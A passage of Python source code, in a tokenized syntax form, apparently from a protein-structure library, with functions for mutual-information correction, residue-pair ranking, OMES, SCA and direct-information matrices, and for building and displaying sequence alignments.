contact prediction. *Bioinformatics* **2008** 24(3):333-340."""<try_stmt><block_start>ndim,shape=mutinfo.ndim mutinfo.shape<block_end><except_stmt>AttributeError<block_start><raise>TypeError('mutinfo must be a 2D square array')<block_end><if_stmt>ndim<ne>2<or>shape[0]<ne>shape[1]<block_start><raise>ValueError('mutinfo must be a 2D square array')<block_end><try_stmt><block_start>sw=corr.startswith<block_end><except_stmt>AttributeError<block_start><raise>TypeError('correction must be a string')<block_end>avg_mipos=mutinfo.sum(1)/(shape[0]-1)<line_sep>avg_mi=avg_mipos.mean()<line_sep>mi=mutinfo.copy()<if_stmt>sw('prod')<or>sw('apc')<block_start><for_stmt>i,i_avg enumerate(avg_mipos)<block_start><for_stmt>j,j_avg enumerate(avg_mipos)<block_start>mi[i j]<augsub>(i_avg<times>j_avg)/avg_mi<block_end><block_end><block_end><elif_stmt>sw('sum')<or>sw('asc')<block_start><for_stmt>i,i_avg enumerate(avg_mipos)<block_start><for_stmt>j,j_avg enumerate(avg_mipos)<block_start>mi[i j]<augsub>i_avg+j_avg-avg_mi<block_end><block_end><block_end><else_stmt><block_start><raise>ValueError('correction must be prod or sum, not '+corr)<block_end><return>mi<block_end><def_stmt>filterRankedPairs pdb indices msa_indices rank_row rank_col zscore_sort num_of_pairs=20 seqDistance=5 resi_range=<none> pdbDistance=8 chain1='A' chain2='A'<block_start>'''
indices and msa_indices are lists output from alignSequenceToMSA
rank_row, rank_col and zscore_sort are the outputs from calcRankorder
:arg num_of_pairs: The number of pairs to be output, if no value is given
then all pairs are output. Default is 20
:type num_of_pairs: int
:arg seqDistance: Remove pairs that are closer than this in the reference sequence
Default is 5
:type seqDistance: int
:arg pdbDistance: Remove pairs with Calpha atoms further apart than this in the PDB
Default is 8
:type pdbDistance: int
:arg chain1: The chain used for the residue specified by rank_row when measuring distances
:type chain1: str
:arg chain2: The chain used for the residue specified by rank_col when measuring distances
:type chain2: str
'''<if_stmt>isscalar(indices)<block_start><raise>TypeError('Please provide a valid indices list')<block_end><if_stmt>isscalar(msa_indices)<block_start><raise>TypeError('Please provide valid msa_indices, which should be a list')<block_end><if_stmt>isscalar(rank_row)<block_start><raise>TypeError('Please provide ranked row from calcRankorder')<block_end><if_stmt>isscalar(rank_col)<block_start><raise>ValueError('Please provide ranked col from calcRankorder')<block_end><if_stmt>isscalar(zscore_sort)<block_start><raise>ValueError('Please provide sorted Z scores from calcRankorder')<block_end><if_stmt>num_of_pairs<is><none><block_start>num_of_pairs=len(rank_row)<block_end>pairList=[]<line_sep>i=-1<line_sep>j=0<while_stmt>j<l>num_of_pairs<block_start>i<augadd>1<line_sep>row_idx=indices[where(msa_indices<eq>rank_row[i])[0][0]]<line_sep>col_idx=indices[where(msa_indices<eq>rank_col[i])[0][0]]<if_stmt><not>isinstance(row_idx Integral)<or><not>isinstance(col_idx Integral)<block_start><continue><block_end><if_stmt>row_idx-col_idx<l>seqDistance<block_start><continue><block_end>distance=calcDistance(pdb.select('chain %s and resid %s'%(chain1 row_idx)).copy() pdb.select('chain %s and resid %s'%(chain2 row_idx)).copy())<if_stmt>distance<g>pdbDistance<block_start><continue><block_end><if_stmt>resi_range<is><not><none><block_start><if_stmt><not>row_idx<in>resi_range<and><not>col_idx<in>resi_range<block_start><continue><block_end><block_end>pairList.append('%3d:\t%3d\t%3d\t%5.1f\t%5.1f\n'%(i row_idx col_idx zscore_sort[i] distance))<line_sep>j<augadd>1<block_end><return>pairList<block_end><def_stmt>buildSeqidMatrix msa turbo=<true><block_start>"""Returns sequence identity matrix for *msa*."""<line_sep>msa=getMSA(msa)<line_sep>LOGGER.timeit('_seqid')<import_from_stmt>.seqtools msaeye<line_sep>dim=msa.shape[0]<line_sep>seqid=msaeye(msa ones((dim dim) float) turbo=bool(turbo))<line_sep>LOGGER.report('Sequence identity matrix was calculated in %.2fs.' '_seqid')<line_sep><return>seqid<block_end>buildSeqidMatrix.__doc__<augadd>doc_turbo<def_stmt>uniqueSequences msa seqid=0.98 turbo=<true><block_start>"""Returns a boolean array marking unique sequences in *msa*. A sequence
sharing sequence identity of *seqid* or more with another sequence coming
before itself in *msa* will have a **True** value in the array."""<line_sep>msa=getMSA(msa)<import_from_stmt>.seqtools msaeye<if_stmt><not>(0<l>seqid<le>1)<block_start><raise>ValueError('seqid must satisfy 0 < seqid <= 1')<block_end><return>msaeye(msa zeros(msa.shape[0] bool) unique=seqid turbo=bool(turbo))<block_end>uniqueSequences.__doc__<augadd>doc_turbo<def_stmt>calcRankorder matrix zscore=<false> **kwargs<block_start>"""Returns indices of elements and corresponding values sorted in
descending order, if *descend* is **True** (default). Can apply a zscore
normalization; by default along *axis* - 0 such that each column has
``mean=0`` and ``std=1``. If *zcore* analysis is used, return value contains the
zscores. If matrix is symmetric only lower triangle indices will be
returned, with diagonal elements if *diag* is **True** (default)."""<try_stmt><block_start>ndim,shape=matrix.ndim matrix.shape<block_end><except_stmt>AttributeError<block_start><raise>TypeError('matrix must be a 2D array')<block_end><if_stmt>ndim<ne>2<block_start><raise>ValueError('matrix must be a 2D array')<block_end>threshold=kwargs.get('thredhold' 0.0001)<try_stmt><block_start>symm=abs((matrix.transpose()-matrix).max())<l>threshold<block_end><except_stmt><block_start>symm=<false><block_end><if_stmt>zscore<block_start>axis=int(bool(kwargs.get('axis' 0)))<line_sep>matrix=(matrix-matrix.mean(axis))/matrix.std(axis)<line_sep>LOGGER.info('Zscore normalization has been applied.')<block_end>descend=kwargs.get('descend' <true>)<if_stmt><not>symm<block_start><if_stmt>descend<block_start>sorted_index=matrix.argsort(axis=<none>)[::-1]<block_end><else_stmt><block_start>sorted_index=matrix.argsort(axis=<none>)<block_end>row=indices(shape)[0].flatten()[sorted_index]<line_sep>column=indices(shape)[1].flatten()[sorted_index]<block_end><else_stmt><block_start>LOGGER.info('Matrix is symmetric, only lower triangle indices '<concat>'will be returned.')<if_stmt>kwargs.get('diag' <true>)<block_start>k=0<block_end><else_stmt><block_start>k=-1<block_end>ind_row,ind_column=tril_indices(shape[0] k=k)<line_sep>matrix_lt=matrix[ind_row ind_column]<if_stmt>descend<block_start>sorted_index=matrix_lt.argsort(axis=<none>)[::-1]<block_end><else_stmt><block_start>sorted_index=matrix_lt.argsort(axis=<none>)<block_end>row=ind_row[sorted_index]<line_sep>column=ind_column[sorted_index]<block_end><return>(row column matrix[row column])<block_end><def_stmt>buildOMESMatrix msa ambiguity=<true> turbo=<true> **kwargs<block_start>"""Returns OMES (Observed Minus Expected Squared) covariance matrix
calculated for *msa*, which may be an :class:`.MSA` instance or a 2D
NumPy character array. OMES is defined as::
(N_OBS - N_EX)^2 (f_i,j - f_i * f_j)^2
OMES_(i,j) = sum(------------------) = N * sum(-----------------------)
N_EX f_i * f_j
Implementation is case insensitive and handles ambiguous amino acids
as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
* Joint probability of observing a pair of ambiguous amino acids is
allocated to all potential combinations, e.g. probability of **XX**
is allocated to 400 combinations of standard amino acids, similarly
probability of **XB** is allocated to 40 combinations of *D* and *N*
with the standard amino acids.
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters as considered as distinct types. All non-alphabet characters
are considered as gaps."""<line_sep>msa=getMSA(msa)<import_from_stmt>.msatools msaomes<line_sep>LOGGER.timeit('_omes')<line_sep>length=msa.shape[1]<line_sep>omes=empty((length length) float)<line_sep>omes=msaomes(msa omes ambiguity=bool(ambiguity) turbo=bool(turbo) debug=bool(kwargs.get('debug' <false>)))<line_sep>LOGGER.report('OMES matrix was calculated in %.2fs.' '_omes')<line_sep><return>omes<block_end>buildOMESMatrix.__doc__<augadd>doc_turbo<def_stmt>buildSCAMatrix msa turbo=<true> **kwargs<block_start>"""Returns SCA matrix calculated for *msa*, which may be an :class:`.MSA`
instance or a 2D Numpy character array.
Implementation is case insensitive and handles ambiguous amino acids
as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
* Joint probability of observing a pair of ambiguous amino acids is
allocated to all potential combinations, e.g. probability of **XX**
is allocated to 400 combinations of standard amino acids, similarly
probability of **XB** is allocated to 40 combinations of *D* and *N*
with the standard amino acids.
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters as considered as distinct types. All non-alphabet characters
are considered as gaps."""<line_sep>msa=getMSA(msa)<if_stmt>msa.shape[0]<l>100<block_start>LOGGER.warning('SCA performs the best with higher number of sequences, and '<concat>'minimal number of sequences is recommended as 100.')<block_end><import_from_stmt>.msatools msasca<line_sep>LOGGER.timeit('_sca')<line_sep>length=msa.shape[1]<line_sep>sca=zeros((length length) float)<line_sep>sca=msasca(msa sca turbo=bool(turbo))<line_sep>LOGGER.report('SCA matrix was calculated in %.2fs.' '_sca')<line_sep><return>sca<block_end>buildSCAMatrix.__doc__<augadd>doc_turbo<def_stmt>buildPCMatrix msa turbo=<false> **kwargs<block_start>"""Returns PC matrix calculated for *msa*, which may be an :class:`.MSA`
instance or a 2D Numpy character array.
Implementation is case insensitive and handles ambiguous amino acids
as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
* Joint probability of observing a pair of ambiguous amino acids is
allocated to all potential combinations, e.g. probability of **XX**
is allocated to 400 combinations of standard amino acids, similarly
probability of **XB** is allocated to 40 combinations of *D* and *N*
with the standard amino acids.
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters as considered as distinct types. All non-alphabet characters
are considered as gaps.
"""<line_sep>msa=getMSA(msa)<import_from_stmt>.msatools msapsicov<line_sep>LOGGER.timeit('_psicov')<line_sep>length=msa.shape[1]<line_sep>pc=zeros((length length) float)<line_sep>pc=msapsicov(msa pc turbo=bool(turbo))<line_sep>LOGGER.report('PC matrix was calculated in %.2fs.' '_psicov')<line_sep><return>pc<block_end><def_stmt>buildDirectInfoMatrix msa seqid=.8 pseudo_weight=.5 refine=<false> **kwargs<block_start>"""Returns direct information matrix calculated for *msa*, which may be an
:class:`.MSA` instance or a 2D Numpy character array.
Sequences sharing sequence identity of *seqid* or more with another
sequence are regarded as similar sequences for calculating their weights
using :func:`.calcMeff`.
*pseudo_weight* are the weight for pseudo count probability.
Sequences are not refined by default. When *refine* is set **True**,
the MSA will be refined by the first sequence and the shape of direct
information matrix will be smaller.
"""<line_sep>msa=getMSA(msa)<import_from_stmt>.msatools msadipretest msadirectinfo1 msadirectinfo2<import_from_stmt>numpy matrix<line_sep>LOGGER.timeit('_di')<if_stmt>msa.shape[0]<l>250<block_start>LOGGER.warning('DI performs the best with higher number of sequences, and '<concat>'minimal number of sequences is recommended as 250.')<block_end>refine=1<if>refine<else>0<line_sep># msadipretest get some parameter from msa to set matrix size
length,q=msadipretest(msa refine=refine)<line_sep>c=matrix.dot(matrix(zeros((length<times>q 1) float)) matrix(zeros((1 length<times>q) float)))<line_sep>prob=zeros((length q+1) float)<line_sep># msadirectinfo1 return c to be inversed and prob to be used
meff,n,length,c,prob=msadirectinfo1(msa c prob theta=1.-seqid pseudocount_weight=pseudo_weight refine=refine q=q+1)<line_sep>c=c.I<line_sep>di=zeros((length length) float)<line_sep># get final DI
di=msadirectinfo2(n length c prob di q+1)<del_stmt>prob c<line_sep>LOGGER.report('DI matrix was calculated in %.2fs.' '_di')<line_sep><return>di<block_end><def_stmt>calcMeff msa seqid=.8 refine=<false> weight=<false> **kwargs<block_start>"""Returns the Meff for *msa*, which may be an :class:`.MSA`
instance or a 2D Numpy character array.
Since similar sequences in an *msa* decreases the diversity of *msa*,
*Meff* gives a weight for sequences in the *msa*.
For example: One sequence in MSA has 5 other similar sequences in this
MSA(itself included). The weight of this sequence is defined as 1/5=0.2.
Meff is the sum of all sequence weights. In another word, Meff can be
understood as the effective number of independent sequences.
Sequences sharing sequence identity of *seqid* or more with another
sequence are regarded as similar sequences to calculate Meff.
Sequences are not refined by default. When *refine* is set **True**, the
MSA will be refined by the first sequence.
The weight for each sequence are returned when *weight* is **True**."""<line_sep>msa=getMSA(msa)<import_from_stmt>.msatools msameff<line_sep>LOGGER.timeit('_meff')<line_sep>refine=1<if>refine<else>0<line_sep>weight=0<if>weight<else>1# A Mark for return weighted array.
<if_stmt>(<not>weight)<block_start>w=zeros((msa.shape[0]) float)<line_sep>meff=msameff(msa theta=1.-seqid meff_only=weight refine=refine w=w)<block_end><else_stmt><block_start>meff=msameff(msa theta=1.-seqid meff_only=weight refine=refine)<block_end>LOGGER.report('Meff was calculated in %.2fs.' '_meff')<line_sep><return>meff<block_end><def_stmt>alignSequencesByChain PDBs **kwargs<block_start>"""
Runs :func:`buildMSA` for each chain and optionally joins the results.
Returns either a single :class:`MSA` or a dictionary containing an :class:`MSA` for each chain.
:arg PDBs: a list of :class:`AtomGroup` objects
:type PDBs: list
:arg join_chains: whether to join chain alignments
default is True
:type join_chains: bool
:arg join_char: a character for joining chain alignments
default is '/' as used by PIR format alignments
:type join_char: str
"""<if_stmt>isscalar(PDBs)<block_start><raise>TypeError('PDBs should be array-like')<block_end><if_stmt><not>PDBs<block_start><raise>ValueError('PDBs should not be empty')<block_end>pdbs=[]<line_sep>chains=[]<for_stmt>i,pdb enumerate(PDBs)<block_start><if_stmt>isinstance(pdb Atomic)<block_start>pdbs.append(pdb)<block_end><else_stmt><block_start><raise>TypeError('each entry in PDBs must be a :class:`Atomic` instance')<block_end>chains.append([])<for_stmt>chain list(pdbs[i].getHierView())<block_start>chains[i].append(chain)<block_end><if_stmt>i<ne>0<and>len(chains[i])<ne>len(chains[0])<block_start><raise>ValueError('all pdbs should have the same number of chains')<block_end><block_end>labels=[]<for_stmt>pdb pdbs<block_start>chids=''<for_stmt>chain list(pdb.getHierView())<block_start>chids<augadd>chain.getChid()<block_end>labels.append(pdb.getTitle()+'_'+chids)<block_end>chains=array(chains)<line_sep>chain_alignments=[]<line_sep>alignments={}<for_stmt>j range(len(chains[0]))<block_start>prefix='chain_'+chains[0 j].getChid()<line_sep>msa=buildMSA(chains[: j] title=prefix labels=labels)<line_sep>msa=refineMSA(msa colocc=1e-9)# remove gap-only cols
chain_alignments.append(msa)<line_sep>alignments[labels[0].split('_')[1][j]]=msa<block_end>join_chains=kwargs.get('join_chains' <true>)<line_sep>join_char=kwargs.get('join_char' '/')<if_stmt>len(chains[0])<eq>1<block_start>join_chains=<false><block_end><if_stmt>join_chains<block_start>joined_msaarr=[]<for_stmt>i,chain_alignment enumerate(chain_alignments)<block_start>pdb_seqs=[]<for_stmt>j,sequence enumerate(chain_alignment)<block_start>pdb_seqs.append(sequence)<block_end>joined_msaarr.append(join_char.join(pdb_seqs))<block_end>result=MSA(joined_msaarr title='joined_chains' labels=[label.split('_')[0]<for>label labels])<block_end><else_stmt><block_start>result=alignments<if_stmt>len(result)<eq>1<block_start>result=result[list(result.keys())[0]]<block_end><block_end><return>result<block_end><def_stmt>buildMSA sequences title='Unknown' labels=<none> **kwargs<block_start>"""
Aligns sequences with clustalw or clustalw2 and returns the resulting MSA.
:arg sequences: a file, MSA object or a list or array containing sequences
as Atomic objects with :func:`getSequence` or Sequence objects or strings.
If strings are used then labels must be provided using ``labels``
:type sequences: :class:`Atomic`, :class:`.MSA`,
:class:`~numpy.ndarray`, str
:arg title: the title for the MSA and it will be used as the prefix for output files.
:type title: str
:arg labels: a list of labels to go with the sequences
:type labels: list
:arg align: whether to align the sequences
default True
:type align: bool
:arg method: alignment method, one of either 'global' (biopython.pairwise2.align.globalms),
'local' (biopython.pairwise2.align.localms), clustalw(2), or another software in your path.
Default is 'clustalw'
:type align: str
"""<line_sep>align=kwargs.get('align' <true>)<line_sep>method=kwargs.pop('method' 'clustalw')<line_sep># 1. check if sequences are in a fasta file and if not make one
<if_stmt>isinstance(sequences str)<block_start>filename=sequences<block_end><elif_stmt><not>isinstance(sequences MSA)<block_start><try_stmt><block_start>max_len=0<for_stmt>sequence sequences<block_start><if_stmt>isinstance(sequence Atomic)<block_start><if_stmt>len(sequence.ca.copy())<g>max_len<block_start>max_len=len(sequence.ca.copy())<block_end><block_end><elif_stmt>isinstance(sequence MSA)<block_start><if_stmt>len(sequence[0])<g>max_len<block_start>max_len=len(sequence[0])<block_end><block_end><else_stmt><block_start><if_stmt>len(sequence)<g>max_len<block_start>max_len=len(sequence)<block_end><block_end><block_end>msa=[]<line_sep>fetched_labels=[]<for_stmt>i,sequence enumerate(sequences)<block_start><if_stmt>isinstance(sequence Atomic)<block_start>strseq=sequence.ca.getSequence()<line_sep>label=sequence.getTitle()<block_end><elif_stmt>isinstance(sequence Sequence)<block_start>strseq=str(sequence)<line_sep>label=sequence.getLabel()<block_end><elif_stmt>isinstance(sequence MSA)<block_start>strseq=str(sequence[0])<line_sep>label=sequence.getLabel(0)<line_sep>LOGGER.warn('Only the first sequence in the MSA at entry {0} is used.'.format(i))<block_end><elif_stmt>isinstance(sequence str)<block_start>strseq=sequence<line_sep>label=str(i+1)<block_end><else_stmt><block_start><raise>TypeError('sequences should be a list of strings, '<concat>'Atomic, or Sequence instances')<block_end>strseq=strseq+'-'<times>(max_len-len(strseq))<line_sep>msa.append(array(list(strseq)))<line_sep>fetched_labels.append(label)<block_end>sequences=array(msa)<block_end><except_stmt><block_start><raise>TypeError('sequences should be iterable')<block_end># "if a list" is a pythonic way to check if a list is empty or not (or none)
<if_stmt><not>labels<and>fetched_labels<block_start>labels=fetched_labels<block_end>label=[label.replace(' ' '_')<for>label labels]<line_sep># labels checkers are removed because they will be properly handled in MSA class initialization
msa=MSA(msa=sequences title=title labels=labels)<if_stmt>align<and>'clustal'<in>method<block_start>filename=writeMSA(title+'.fasta' msa)<block_end><block_end><if_stmt>align# 2. find and run alignment method
<block_start><if_stmt>method<in>['biopython' 'local' 'global']<block_start><if_stmt>len(sequences)<eq>2<block_start>msa,_,_=alignTwoSequencesWithBiopython(sequences[0] sequences[1] **kwargs)<block_end><else_stmt><block_start><raise>ValueError("Provide only two sequences or another method. \
Biopython pairwise alignment can only be used \
to build an MSA with two sequences.")<block_end><block_end><elif_stmt>'clustalw'<in>method<block_start>clustalw=which('clustalw')<if_stmt>clustalw<is><none><block_start><if_stmt>which('clustalw2')<is><not><none><block_start>clustalw=which('clustalw2')<block_end><else_stmt><block_start><raise>EnvironmentError("The executable for clustalw was not found, \
install clustalw or add it to the path.")<block_end><block_end>os.system('"%s" %s -OUTORDER=INPUT'%(clustalw filename))<line_sep># 3. parse and return the new MSA
msa=parseMSA(title+'.aln')<block_end><else_stmt><block_start>alignTool=which(method)<if_stmt>alignTool<is><none><block_start><raise>EnvironmentError("The executable for {0} was not found, \
install it or add it to the path.".format(alignTool))<block_end>os.system('"%s" %s -OUTORDER=INPUT'%(clustalw filename))<line_sep># 3. parse and return the new MSA
msa=parseMSA(title+'.aln')<block_end><block_end><return>msa<block_end><def_stmt>showAlignment alignment **kwargs<block_start>"""
Prints out an alignment as sets of short rows with labels.
:arg alignment: any object with aligned sequences
:type alignment: :class: `.MSA`, list
:arg row_size: the size of each row
default 60
:type row_size: int
:arg indices: a set of indices for some or all sequences
that will be shown above the relevant sequences
:type indices: :class:`~numpy.ndarray`, list
:arg index_start: how far along the alignment to start putting indices
default 0
:type index_start: int
:arg index_stop: how far along the alignment to stop putting indices
default the point when the shortest sequence stops
:type index_stop: int
:arg labels: a list of labels
:type labels: list
"""<line_sep>row_size=kwargs.get('row_size' 60)<line_sep>labels=kwargs.get('labels' <none>)<if_stmt>labels<is><not><none><block_start><if_stmt>isscalar(labels)<block_start><raise>TypeError('labels should be array-like')<block_end><for_stmt>label labels<block_start><if_stmt><not>isinstance(label str)<block_start><raise>TypeError('each label should be a string')<block_end><block_end><if_stmt>len(labels)<l>len(alignment)<block_start><raise>ValueError('there should be a label for every sequence shown')<block_end><block_end><else_stmt><block_start>labels=[]<for_stmt>i,sequence enumerate(alignment)<block_start><if_stmt>hasattr(sequence 'getLabel')<block_start>labels.append(sequence.getLabel())<block_end><else_stmt><block_start>labels.append(str(i+1))<block_end><block_end><block_end>indices=kwargs.get('indices' <none>)<line_sep>index_start=kwargs.get('index_start' 0)<line_sep>index_stop=kwargs.get('index_stop' 0)<if_stmt>index_stop<eq>0<and>indices<is><not><none><block_start>locs=[]<line_sep>maxes=[]<for_stmt>index indices<block_start>int_index=[]<for_stmt>i index<block_start><if_stmt>i<eq>''<block_start>int_index.append(0)<block_end><else_stmt><block_start>int_index.append(int(i))<block_end><block_end>int_index=array(int_index)<line_sep>maxes.append(max(int_index))<line_sep>locs.append(where(int_index<eq>max(int_index))[0][0])<block_end>index_stop=locs[where(maxes<eq>min(maxes))[0][0]]<block_end><for_stmt>i range(int(ceil(len(alignment[0])/float(row_size))))<block_start><for_stmt>j range(len(alignment))<block_start><if_stmt>indices<is><not><none><block_start>sys.stdout.write('\n'+' '<times>15+'\t')<for_stmt>k range(row_size<times>i+10 row_size<times>(i+1)+10 10)<block_start><try_stmt><block_start><if_stmt>k<g>index_start+10<and>k<l>index_stop+10<block_start>sys.stdout.write('{:10d}'.format(int(indices[j][k-1])))<block_end><elif_stmt>k<l>index_stop<block_start>sys.stdout.write(' '<times>(k-index_start))<block_end><else_stmt><block_start>sys.stdout.write(' '<times>10)<block_end><block_end><except_stmt><block_start>sys.stdout.write(' '<times>10)<block_end><block_end>sys.stdout.write('\n')<block_end>sys.stdout.write(labels[j][:15]+' '<times>(15-len(labels[j][:15]))+'\t'+str(alignment[j])[60<times>i:60<times>(i+1)]+'\n')<block_end>sys.stdout.write('\n')<block_end><return><block_end><def_stmt>alignSequenceToMSA seq msa **kwargs<block_start>"""
Align a sequence from a PDB or Sequence to a sequence from an MSA
and create two sets of indices.
The sequence from the MSA (*seq*), the alignment and
the two sets of indices are returned.
The first set (*indices*) maps the residue numbers in the PDB to
the reference sequence. The second set (*msa_indices*) indexes the
reference sequence in the msa and is used for retrieving values
from the first indices.
:arg seq: an object with an associated sequence string
or a sequence string itself
:type seq: :class:`.Atomic`, :class:`.Sequence`, str
:arg msa: a multiple sequence alignment
:type msa: :class:`.MSA`
:arg label: a label for a sequence in msa or a PDB ID
``msa.getIndex(label)`` must return a sequence index
:type label: str
:arg chain: which chain from pdb to use for alignment, default is **None**,
which does no selection on *seq*. This value will be ignored if seq is
not an :class:`.Atomic` object.
:type chain: str
Parameters for Biopython ``pairwise2`` alignments can be provided as
keyword arguments. Default values are originally from ``proteins.compare``
module, but now found in ``utilities.seqtools``.
:arg match: a positive integer, used to reward finding a match
:type match: int
:arg mismatch: a negative integer, used to penalise finding a mismatch
:type mismatch: int
:arg gap_opening: a negative integer, used to penalise opening a gap
:type gap_opening: int
:arg gap_extension: a negative integer, used to penalise extending a gap
:type gap_extension: int
:arg method: method for pairwise2 alignment.
Possible values are ``"local"`` and ``"global"``
:type method: str
"""<line_sep>label=kwargs.get('label' <none>)<line_sep>chain=kwargs.get('chain' <none>)<line_sep>match=kwargs.get('match' MATCH_SCORE)<line_sep>mismatch=kwargs.get('mismatch' MISMATCH_SCORE)<line_sep>gap_opening=kwargs.get('gap_opening' GAP_PENALTY)<line_sep>gap_extension=kwargs.get('gap_extension' GAP_EXT_PENALTY)<line_sep>method=kwargs.get('method' ALIGNMENT_METHOD)<if_stmt>isinstance(seq Atomic)<block_start><if_stmt>isinstance(chain str)<block_start>ag=seq.select('chain {0}'.format(chain))<block_end><elif_stmt>chain<is><none><block_start>ag=seq<line_sep>chids=ag.getChids()<if_stmt>len(unique(chids))<g>1<block_start>LOGGER.warn('%s consists of multiple chains. Please consider selecting one chain'%(seq.getTitle()))<block_end><block_end><else_stmt><block_start><raise>TypeError('chain should be a string or None')<block_end><if_stmt>ag<is><none><block_start><raise>ValueError('seq may be None or chain ID may be invalid')<block_end>sequence=ag.select('ca').getSequence()<block_end><elif_stmt>isinstance(seq Sequence)<block_start>sequence=str(seq)<line_sep>ag=<none><block_end><elif_stmt>isinstance(seq str)<block_start>sequence=seq<line_sep>ag=<none><block_end><else_stmt><block_start><raise>TypeError('seq must be an atomic class, sequence class, or str not {0}'.format(type(seq)))<block_end><if_stmt><not>isinstance(msa MSA)<block_start><raise>TypeError('msa must be an MSA instance')<block_end><if_stmt>label<is><none><block_start><if_stmt>ag<block_start>label=ag.getTitle().split('_')[0]<block_end><elif_stmt>isinstance(seq Sequence)<block_start>label=seq.getLabel()<block_end><else_stmt><block_start><raise>ValueError('A label cannot be extracted from seq so please provide one.')<block_end><block_end>index=msa.getIndex(label)<if_stmt>index<is><none><and>(len(label)<eq>4<or>len(label)<eq>5)<block_start><import_from_stmt>prody parsePDB<try_stmt><block_start>structure,header=parsePDB(label[:4] header=<true>)<block_end><except_stmt>Exception<as>err<block_start><raise>IOError('failed to parse header for {0} ({1})'.format(label[:4] str(err)))<block_end>chid=chain<for_stmt>poly header['polymers']<block_start><if_stmt>chid<and>poly.chid<ne>chid<block_start><continue><block_end><for_stmt>dbref poly.dbrefs<block_start><if_stmt>index<is><none><block_start>index=msa.getIndex(dbref.idcode)<if_stmt>index<is><not><none><block_start>LOGGER.info('{0} idcode {1} for {2}{3} '<concat>'is found in {4}.'.format(dbref.database dbref.idcode label[:4] poly.chid str(msa)))<line_sep>label=dbref.idcode<line_sep><break><block_end><block_end><if_stmt>index<is><none><block_start>index=msa.getIndex(dbref.accession)<if_stmt>index<is><not><none><block_start>LOGGER.info('{0} accession {1} for {2}{3} '<concat>'is found in {4}.'.format(dbref.database dbref.accession label[:4] poly.chid str(msa)))<line_sep>label=dbref.accession<line_sep><break><block_end><block_end><block_end><block_end><if_stmt>index<is><not><none><block_start>chain=structure[poly.chid]<block_end><block_end><if_stmt>index<is><none><block_start><raise>ValueError('label is not in msa, or msa is not indexed')<block_end><try_stmt><block_start>len(index)<block_end><except_stmt>TypeError<block_start><pass><block_end><else_stmt><block_start><raise>ValueError('label {0} maps onto multiple sequences, '<concat>'so cannot be used for refinement'.format(label))<block_end><if_stmt>isinstance(index int)<block_start>refMsaSeq=str(msa[index]).upper().replace('-' '.')<block_end><else_stmt><block_start><raise>TypeError('The output from querying that label against msa is not a single sequence.')<block_end><if_stmt>method<eq>'local'<block_start>alignment=pairwise2.align.localms(sequence str(refMsaSeq) match mismatch gap_opening gap_extension one_alignment_only=1)<block_end><elif_stmt>method<eq>'global'<block_start>alignment=pairwise2.align.globalms(sequence str(refMsaSeq) match mismatch gap_opening gap_extension one_alignment_only=1)<block_end><else_stmt><block_start><raise>ValueError('method should be local or global')<block_end>seq_indices=[0]<line_sep>msa_indices=[0]<for_stmt>i range(len(alignment[0][0]))<block_start><if_stmt>alignment[0][0][i]<ne>'-'<block_start>seq_indices.append(seq_indices[i]+1)<block_end><else_stmt><block_start>seq_indices.append(seq_indices[i])<block_end><if_stmt>alignment[0][1][i]<ne>'-'<block_start>msa_indices.append(msa_indices[i]+1)<block_end><else_stmt><block_start>msa_indices.append(msa_indices[i])<block_end><block_end>seq_indices.pop(0)# The first element was extra for initialisation
msa_indices.pop(0)# The first element was extra for initialisation
seq_indices=array(seq_indices)<line_sep>msa_indices=array(msa_indices)<if_stmt>ag<block_start>seq_indices<augadd>ag.getResnums()[0]-1<block_end>alignment=MSA(msa=array([array(list(alignment[0][0])) array(list(alignment[0][1]))]) labels=[ag.getTitle() label])<line_sep><return>alignment seq_indices msa_indices<block_end><def_stmt>alignTwoSequencesWithBiopython seq1 seq2 **kwargs<block_start>"""Easily align two sequences with Biopython's globalms or localms.
Returns an MSA and indices for use with :func:`.showAlignment`.
Alignment parameters can be provided as keyword arguments.
Default values are as originally set in the proteins.compare
module, but now found in utilities.seqtools.
:arg match: a positive integer, used to reward finding a match
:type match: int
:arg mismatch: a negative integer, used to penalise finding a mismatch
:type mismatch: int
:arg gap_opening: a negative integer, used to penalise opening a gap
:type gap_opening: int
:arg gap_extension: a negative integer, used to penalise extending a gap
:type gap_extension: int
:arg method: method for pairwise2 alignment.
Possible values are 'local' and 'global'
:type method: str
"""<line_sep>match=kwargs.get('match' MATCH_SCORE)<line_sep>mismatch=kwargs.get('mismatch' MISMATCH_SCORE)<line_sep>gap_opening=kwargs.get('gap_opening' GAP_PENALTY)<line_sep>gap_extension=kwargs.get('gap_extension' GAP_EXT_PENALTY)<line_sep>method=kwargs.get('method' ALIGNMENT_METHOD)<if_stmt>method<eq>'local'<block_start>alignment=pairwise2.align.localms(seq1 seq2 match mismatch gap_opening gap_extension)<block_end><elif_stmt>method<eq>'global'<block_start>alignment=pairwise2.align.globalms(seq1 seq2 match mismatch gap_opening gap_extension)<block_end><else_stmt><block_start><raise>ValueError('method should be local or global')<block_end>seq_indices=[0]<line_sep>msa_indices=[0]<for_stmt>i 